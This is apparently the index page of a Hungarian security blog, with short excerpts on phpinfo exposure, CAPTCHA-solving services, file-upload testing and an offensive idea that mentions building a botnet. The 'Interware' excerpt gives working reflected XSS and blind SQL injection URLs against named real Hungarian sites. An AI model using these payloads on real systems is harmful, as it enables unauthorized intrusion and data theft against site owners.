0xFF

Offensive # it might work!

Szokták mondani, hogy “The best defense is a good offense” és van is benne valami. Ez az ötlet csak az un “Script Kiddie” ellen hatásos de itt most nem is hatásosságáról van szó inkább azon, hogy egy jót szórakozzunk, esetleg egy bot-net építésűnk. A módszer pofon egyszerű: 1. Találjunk ki egy fantázia nevet pl: Remote [...]

SMS küldés és fogadás @ PHP

Nem tudod, hogy mit kezdjél azzal a rengeteg SMS-el amit a szolgáltatód ad? Undod telefonon írni az SMS-t? Olcsóbbnak találod a szolgáltatód SMS árait mint az SMS küldő cégekét? Drágának találod az “egyedi” megoldásokat? (securix-sms) !!!Van megoldás!!! Csak most csak neked csak itt! AKCIÓ!!! *Szerintem azt az embert aki a marquee és blink -et bármilyen [...]

phpinfo() statisztika

Mindannyian tudjuk, hogy milyen biztonsági kockázatot jelenthet egy publikus phpinfo() oldal, full path disclosure, használható “LFI támogatására”, a régebbi verziókban található XSS is, megvannak benne a sütik (http_only is), BasicAuth header stb. Ha valaki talál pl egy XSS-t és van egy phpinfo() file a szerveren, lényegesen javulnak az esélyei. Van egy raklap .hu domain nevem [...]

Protected: bxxx.hu

There is no excerpt because this is a protected post.

CAPTCHA @ citromail.hu

A minap valamiért a citromail.hu oldalra tévedtem és megakadt a szemem a CAPTCHA-n. Mindenki ismeri a különféle captcha bypass oldalakat, ahol 1000 captcha megoldása 1-2 dollárba kelül (1.39$/1000/deathbycaptcha), van 15 nyelven API hozzá és bónuszként a hibákat nem számolják fel feltéve ha az ember veszi a fáradságot és visszajelez hogy nem volt rendben és így [...]

Protected: hiteXXXXXXX.hu SQL Injection

There is no excerpt because this is a protected post.

Technet.hu FAIL!

Hoz ez a kereső mindent ami kell: Reflected XSS : http://bit.ly/technet_hu_xss Blind SQLi : http://bit.ly/technet_hu_sqli UPDATE: Mostanra sikerült kíjavítani a hibát.

XSS Express

Nem permanens de akkor is szép http://bit.ly/pfAy7O

Interware

XSS: Nem permanens de secure.interware.hu: https://secure.interware.hu/forgotpassword.do?customerID=”><h1>XSS</h1>&emailAddr=<h1>XSS</h1> Permanens XSS : http://www.interware.hu/index.php?m=vkonyv&menuid=10 SQLi: http://www.interware.hu/index.php?infotype=technical&productid=23+AND+substring(version(),1,1)=4 http://www.interware.hu/index.php?gpmid=351+AND+substring(version(),1,1)=4 http://www.interware.hu/index.php?m=gyik&menuid=6&qid=88+AND+substring(version(),1,1)=4 http://www.interware.hu/index.php?productid=64+AND+substring(version(),1,1)=4

PHP + Heidi Klum

Ma már szinte mindenhol találkozunk olyan weboldalakkal amelyek lehetőséget adnak fileok feltöltésére, legyen az egy blogmotor, webshop, képgaléria stb. A “pentester” szempontjából a file-kezelés mindig egy érdekes terület. Mindig is akartam egy filecsomagot amivel tesztelhetek egy file-kezelést, és most végre össze is raktam Heidi Klum segítségével. Programozói hibák. #1 $_FILES["file"]["type"] avagy MIME TYPE : Nagyon [...]